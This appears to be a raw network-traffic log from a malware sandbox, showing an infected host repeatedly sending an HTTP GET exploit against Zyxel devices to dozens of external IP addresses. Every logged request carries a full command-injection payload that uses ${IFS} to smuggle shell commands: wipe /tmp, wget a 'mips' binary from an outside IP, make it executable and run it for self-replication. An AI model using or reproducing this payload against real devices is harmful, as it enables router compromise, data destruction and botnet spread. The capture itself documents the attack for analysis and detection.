                              Mar 31, 2024 08:41:28.885154963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4816192.168.2.133997470.235.91.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885209084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4817192.168.2.134418882.29.90.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885256052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4818192.168.2.134410047.208.193.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885293007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4819192.168.2.134766662.202.172.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885337114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4820192.168.2.134557436.3.137.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885366917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4821192.168.2.136063693.51.81.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885394096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4822192.168.2.1353000184.240.148.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885441065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4823192.168.2.133388291.202.123.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885483980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4824192.168.2.1348130154.38.101.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885529041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4825192.168.2.1342048119.43.252.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885555983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4826192.168.2.134152639.184.90.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885590076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4827192.168.2.134089060.53.38.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885642052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4828192.168.2.135146881.35.94.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885688066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4829192.168.2.1360450203.188.76.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885729074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4830192.168.2.134273644.241.65.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885752916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4831192.168.2.133614283.130.6.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885806084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4832192.168.2.133305025.203.230.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885842085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4833192.168.2.1343028124.68.78.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.888803959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4834192.168.2.1349326120.48.215.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889374971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4835192.168.2.1343530183.255.195.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889404058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4836192.168.2.1346326169.86.4.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889467955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4837192.168.2.133443034.233.123.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889492989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4838192.168.2.1352450169.88.112.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889542103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4839192.168.2.1352134193.39.78.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889575958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4840192.168.2.1354616133.116.120.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889617920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4841192.168.2.1353476116.150.132.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889652014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4842192.168.2.1353246133.219.14.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889679909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4843192.168.2.1357746185.121.214.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889719009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4844192.168.2.1338564179.117.173.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889758110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4845192.168.2.133881823.36.61.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889787912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4846192.168.2.135231498.153.85.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889802933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4847192.168.2.133507862.134.170.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.889838934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4848192.168.2.135627452.50.231.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886671066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4849192.168.2.1358536151.101.224.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886795998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4850192.168.2.135490850.33.34.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886814117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4851192.168.2.133921675.45.147.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886882067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4852192.168.2.1352430130.176.149.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886930943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4853192.168.2.1354674199.234.16.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.886982918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4854192.168.2.1348794172.105.194.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887001991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4855192.168.2.134082672.244.142.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887031078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4856192.168.2.134236650.128.130.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887083054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4857192.168.2.135543676.46.69.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887120008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4858192.168.2.1347832183.81.152.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887152910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4859192.168.2.135532631.253.149.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887186050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4860192.168.2.1339384222.151.93.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887238979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4861192.168.2.13482785.186.76.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887274981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4862192.168.2.1358738193.42.3.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887303114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4863192.168.2.134520632.216.248.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887373924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4864192.168.2.1334998175.204.132.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887398958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4865192.168.2.1360836108.142.33.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887449980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4866192.168.2.1358720149.112.159.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887500048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4867192.168.2.134800058.103.148.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887542963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4868192.168.2.1347128117.88.30.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887573957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4869192.168.2.1351684185.99.1.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887593985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4870192.168.2.1338556174.3.75.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887656927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4871192.168.2.1359476208.170.232.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887681007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4872192.168.2.136056862.236.63.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887732029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4873192.168.2.134479084.77.228.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887774944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4874192.168.2.134644688.154.128.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887825012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4875192.168.2.13520849.81.225.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887880087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4876192.168.2.133370444.203.115.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887916088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4877192.168.2.1358696121.230.132.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.887974024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4878192.168.2.1345504208.182.140.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888017893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4879192.168.2.1340896213.20.42.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888052940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4880192.168.2.1333556203.189.85.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888083935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4881192.168.2.135811883.224.56.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888113976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4882192.168.2.1334526141.122.68.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888173103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4883192.168.2.135734696.241.107.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.888240099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4884192.168.2.1351500186.115.49.207443
                              TimestampBytes transferredDirectionData
